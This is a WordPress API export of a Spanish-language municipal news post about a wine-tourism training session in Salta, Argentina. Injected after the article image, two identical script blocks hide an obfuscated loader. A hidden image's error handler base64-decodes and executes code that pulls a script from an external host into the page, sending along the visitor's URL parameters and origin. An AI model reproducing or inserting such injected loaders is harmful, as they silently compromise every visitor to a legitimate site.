{"id":1641,"date":"2022-10-19T23:58:09","date_gmt":"2022-10-20T02:58:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1641"},"modified":"2025-08-14T00:32:47","modified_gmt":"2025-08-14T03:32:47","slug":"la-ciudad-busca-posicionarse-como-un-centro-urbano-del-turismo-enologico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1641","title":{"rendered":"La ciudad busca posicionarse como un centro urbano del turismo enol\u00f3gico"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#820323\"><strong><em>En el marco de \u201cLa Ciudad de Salta, km 0 de la Ruta del Vino\u201d, la Municipalidad invita a todo el sector gastron\u00f3mico hotelero a sumarse a la capacitaci\u00f3n presencial a cargo de la sommelier Lorena Rodas. Ser\u00e1 este jueves, 20 de octubre, de 15 a 17 en La Rioja 427.<\/em><\/strong><\/h4>\n\n\n\n<p>En el marco del Plan de Formaci\u00f3n Tur\u00edstica Municipal,&nbsp; la Secretar\u00eda de Cultura y Turismo, invita a participar de las actividades destinadas al sector gastron\u00f3mico hotelero. Con el objetivo de generar cl\u00ednicas, disertaciones y capacitaciones te\u00f3rico-pr\u00e1cticas para fortalecer el conocimiento sobre la Ruta del Vino.&nbsp;<\/p>\n\n\n\n<p>Para eso, ma\u00f1ana, jueves 20 de octubre, de 15 a 17 se dar\u00e1 inicio al M\u00f3dulo I, a cargo de la sommelier Lorena Rodas. Ser\u00e1 en el espacio ubicado en calle La Rioja 427 .&nbsp;<\/p>\n\n\n\n<p>El trabajo se realizar\u00e1 junto a la C\u00e1mara Hotelera, Gastron\u00f3mica y Afines y Bodegas de Salta, lo cual, permitir\u00e1 un fortalecimiento para el sector y un alcance positivo gracias a la articulaci\u00f3n p\u00fablico-privado y la participaci\u00f3n de proveedores locales.&nbsp;&nbsp;<\/p>\n\n\n\n<p>En este primer encuentro se trabajar\u00e1 sobre: La&nbsp;Historia del vino salte\u00f1o. El Torront\u00e9s, la cepa emblema y sus caracter\u00edsticas distintivas. Introducci\u00f3n a la atenci\u00f3n del servicio de mesa.&nbsp;<\/p>\n\n\n\n<p>La ciudad de Salta es un centro urbano de consumo y distribuci\u00f3n de vinos que busca, tambi\u00e9n, posicionarse como una ciudad de experiencias asociadas al vino. A su vez, apunta a fortalecer la presencia conceptual del vino, en cada uno de los diversos eslabones de la cadena de valor de servicios tur\u00edsticos, a fin de posicionarse como el \u201ckm 0 de la Ruta del Vino\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/10\/whatsapp-image-2022-10-19-at-144449.jpeg\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de \u201cLa Ciudad de Salta, km 0 de la Ruta del Vino\u201d, la Municipalidad invita a todo el sector gastron\u00f3mico hotelero a sumarse a la capacitaci\u00f3n presencial a cargo de la sommelier Lorena Rodas. Ser\u00e1 este jueves, 20 de octubre, de 15 a 17 en La Rioja 427. En el marco del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1642,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,18],"tags":[],"class_list":{"0":"post-1641","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1641"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1641"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1641\/revisions"}],"predecessor-version":[{"id":7312,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1641\/revisions\/7312"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1642"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}